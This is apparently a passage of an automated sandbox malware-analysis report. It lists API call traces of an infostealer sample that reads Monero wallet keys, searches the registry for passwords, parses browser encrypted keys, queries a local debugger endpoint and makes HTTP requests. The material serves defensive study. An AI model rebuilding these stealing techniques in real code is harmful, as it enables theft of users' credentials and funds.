                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 12458d98b96d70f46138b7f3c8a5f032c5fdeb05b979a31381b6175dea7cd6fa
                              • Instruction ID: 830b047f9c5875c8f4caaa797492912e528774f86c5ab4c54fd73144ac9fff04
                              • Opcode Fuzzy Hash: 12458d98b96d70f46138b7f3c8a5f032c5fdeb05b979a31381b6175dea7cd6fa
                              • Instruction Fuzzy Hash: 39511B309101189BCB18EF68EDA6AED7779FF10340F504458E906EB591EF306B85CB63
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: dd3708d8bb6db78dffb2d0751ddea64f2f96c175f7f50501896415187a55c019
                              • Instruction ID: fd913ca3aeed34b79b4741a033098214010b931004fb49f8d7fd38750e0f7253
                              • Opcode Fuzzy Hash: dd3708d8bb6db78dffb2d0751ddea64f2f96c175f7f50501896415187a55c019
                              • Instruction Fuzzy Hash: C6C181B59001299BCF18EF64EC99FEE7779FF64304F004598E409AB281DA70AAC5CF91
                              APIs
                                • Part of subcall function 00828F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 0082453C
                              • lstrcat.KERNEL32(?,015FDE30), ref: 0082455B
                              • lstrcat.KERNEL32(?,?), ref: 0082456F
                              • lstrcat.KERNEL32(?,015FCF40), ref: 00824583
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 00828F20: GetFileAttributesA.KERNEL32(00000000,?,00811B94,?,?,0083577C,?,?,00830E22), ref: 00828F2F
                                • Part of subcall function 0081A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0081A489
                                • Part of subcall function 0081A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0081A13C
                                • Part of subcall function 0081A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0081A161
                                • Part of subcall function 0081A110: LocalAlloc.KERNEL32(00000040,?), ref: 0081A181
                                • Part of subcall function 0081A110: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 0081A1AA
                                • Part of subcall function 0081A110: LocalFree.KERNEL32(0081148F), ref: 0081A1E0
                                • Part of subcall function 0081A110: CloseHandle.KERNEL32(000000FF), ref: 0081A1EA
                                • Part of subcall function 00829550: GlobalAlloc.KERNEL32(00000000,0082462D,0082462D), ref: 00829563
                              • StrStrA.SHLWAPI(?,015FDE90), ref: 00824643
                              • GlobalFree.KERNEL32(?), ref: 00824762
                                • Part of subcall function 0081A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814F3E,00000000,00000000), ref: 0081A23F
                                • Part of subcall function 0081A210: LocalAlloc.KERNEL32(00000040,?,?,?,00814F3E,00000000,?), ref: 0081A251
                                • Part of subcall function 0081A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814F3E,00000000,00000000), ref: 0081A27A
                                • Part of subcall function 0081A210: LocalFree.KERNEL32(?,?,?,?,00814F3E,00000000,?), ref: 0081A28F
                              • lstrcat.KERNEL32(?,00000000), ref: 008246F3
                              • StrCmpCA.SHLWAPI(?,008308D2), ref: 00824710
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00824722
                              • lstrcat.KERNEL32(00000000,?), ref: 00824735
                              • lstrcat.KERNEL32(00000000,00830FA0), ref: 00824744
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 1607c17120862fc961c392870c1a4e682899831f4c4b61f062e00630050a3bcb
                              • Instruction ID: f6ebaf770458baf4ebf3e8af52263b1e4f84b0a7bd0205d07e113c7ab38629d9
                              • Opcode Fuzzy Hash: 1607c17120862fc961c392870c1a4e682899831f4c4b61f062e00630050a3bcb
                              • Instruction Fuzzy Hash: EA7152B6900218ABDB14EBA4ED96FDE737DFF88300F004598F615D6181EA359B85CF62
                              APIs
                                • Part of subcall function 008112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008112B4
                                • Part of subcall function 008112A0: RtlAllocateHeap.NTDLL(00000000), ref: 008112BB
                                • Part of subcall function 008112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008112D7
                                • Part of subcall function 008112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008112F5
                                • Part of subcall function 008112A0: RegCloseKey.ADVAPI32(?), ref: 008112FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0081134F
                              • lstrlen.KERNEL32(?), ref: 0081135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00811377
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 00828CF0: GetSystemTime.KERNEL32(00830E1B,015FA008,008305B6,?,?,008113F9,?,0000001A,00830E1B,00000000,?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 00828D16
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00811465
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 0081A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0081A13C
                                • Part of subcall function 0081A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0081A161
                                • Part of subcall function 0081A110: LocalAlloc.KERNEL32(00000040,?), ref: 0081A181
                                • Part of subcall function 0081A110: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 0081A1AA
                                • Part of subcall function 0081A110: LocalFree.KERNEL32(0081148F), ref: 0081A1E0
                                • Part of subcall function 0081A110: CloseHandle.KERNEL32(000000FF), ref: 0081A1EA
                              • DeleteFileA.KERNEL32(00000000), ref: 008114EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: e82407ba80eef13f17ee2b50f4c42942e8750f1c3ba8601fdf14d65d49cac0d1
                              • Instruction ID: 94172fb672d053bc0b3dbdde9e8cf58e824d4a2c5f140cda3eccdf8478614fe3
                              • Opcode Fuzzy Hash: e82407ba80eef13f17ee2b50f4c42942e8750f1c3ba8601fdf14d65d49cac0d1
                              • Instruction Fuzzy Hash: 5D5121B1D501285BCB19EB64EDA6AED733DFF54300F4045D8B60AA2091EE305BC9CBA6
                              APIs
                              • InternetOpenA.WININET(00830AF6,00000001,00000000,00000000,00000000), ref: 00819A6A
                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00819AAB
                              • InternetCloseHandle.WININET(00000000), ref: 00819AC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$Open$CloseHandle
                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                              • API String ID: 3289985339-2144369209
                              • Opcode ID: 39776422977606c79a809fcb6573faf0bae20e6483fafd3a78cf422dbcd054f0
                              • Instruction ID: e06c6578720bbe86d4c566317cf09024412851eb328afbefe723bb5848312f7b
                              • Opcode Fuzzy Hash: 39776422977606c79a809fcb6573faf0bae20e6483fafd3a78cf422dbcd054f0
                              • Instruction Fuzzy Hash: 43410675A10268ABCB14EB94DCA5FDD7778FF48750F104198F549EA290CBB4AAC0CF60
                              APIs
                                • Part of subcall function 00817330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0081739A
                                • Part of subcall function 00817330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00817411
                                • Part of subcall function 00817330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0081746D
                                • Part of subcall function 00817330: GetProcessHeap.KERNEL32(00000000,?), ref: 008174B2
                                • Part of subcall function 00817330: HeapFree.KERNEL32(00000000), ref: 008174B9
                              • lstrcat.KERNEL32(00000000,0083192C), ref: 00817666
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008176A8
                              • lstrcat.KERNEL32(00000000, : ), ref: 008176BA
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008176EF
                              • lstrcat.KERNEL32(00000000,00831934), ref: 00817700
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00817733
                              • lstrcat.KERNEL32(00000000,00831938), ref: 0081774D
                              • task.LIBCPMTD ref: 0081775B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 17f17ba501ba1470ec779dcdd3eb2ce9d74ae9d319718f2d751ce8a031179306
                              • Instruction ID: 878d316930832b414cb26e43a31d27e9ddaea5fd81692e0a175f540d05414f21
                              • Opcode Fuzzy Hash: 17f17ba501ba1470ec779dcdd3eb2ce9d74ae9d319718f2d751ce8a031179306
                              • Instruction Fuzzy Hash: 96313AB2904148EBDB04EBE4DD96DEE7779FF44301F504518F112EB2A0DA34A986CB91
                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 00814800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814889
                                • Part of subcall function 00814800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814899
                              • InternetOpenA.WININET(00830DFB,00000001,00000000,00000000,00000000), ref: 0081615F
                              • StrCmpCA.SHLWAPI(?,015FE430), ref: 00816197
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 008161DF
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00816203
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 0081622C
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0081625A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00816299
                              • InternetCloseHandle.WININET(?), ref: 008162A3
                              • InternetCloseHandle.WININET(00000000), ref: 008162B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 51c765e5d554f928a2f77da8ab4d73fc636777a37baf0ad2537569b1c1a520aa
                              • Instruction ID: c0b9f091e82e7e3fe803a8b8894282b7ed36ddc4dbaf35b1374f691f1fb23d47
                              • Opcode Fuzzy Hash: 51c765e5d554f928a2f77da8ab4d73fc636777a37baf0ad2537569b1c1a520aa
                              • Instruction Fuzzy Hash: E1514CB1A00218ABDB24DF94DC85BEE7779FF44305F008598E605EB180EB74AAC9CF95
                              APIs
                              • type_info::operator==.LIBVCRUNTIME ref: 0089024D
                              • ___TypeMatch.LIBVCRUNTIME ref: 0089035B
                              • CatchIt.LIBVCRUNTIME ref: 008903AC
                              • CallUnexpected.LIBVCRUNTIME ref: 008904C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                              • String ID: csm$csm$csm
                              • API String ID: 2356445960-393685449
                              • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                              • Instruction ID: e498a5ad6447f02e61760acaf208cc7e41744ed4ba75a69933b49eb35cae2506
                              • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                              • Instruction Fuzzy Hash: FEB16B71800209EFCF15FFA8C8859AEBBB5FF14314B18416AEA15EB212D731DA51CF96
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0081739A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00817411
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0081746D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008174B2
                              • HeapFree.KERNEL32(00000000), ref: 008174B9
                              • task.LIBCPMTD ref: 008175B5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: f241527ef73177261b0bf835a13ac83d5e5c28a4d75e6638315486c80406e423
                              • Instruction ID: 8e1a5eaa1930f14aecdf3d282efd6c61b7e0c9902acc0be7f06fb14c4f6a86e8
                              • Opcode Fuzzy Hash: f241527ef73177261b0bf835a13ac83d5e5c28a4d75e6638315486c80406e423
                              • Instruction Fuzzy Hash: 0A6119B580416C9BDB24DB54CC55BDAB7BDFF58300F0081E9E649A6241EBB06BC9CF91
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
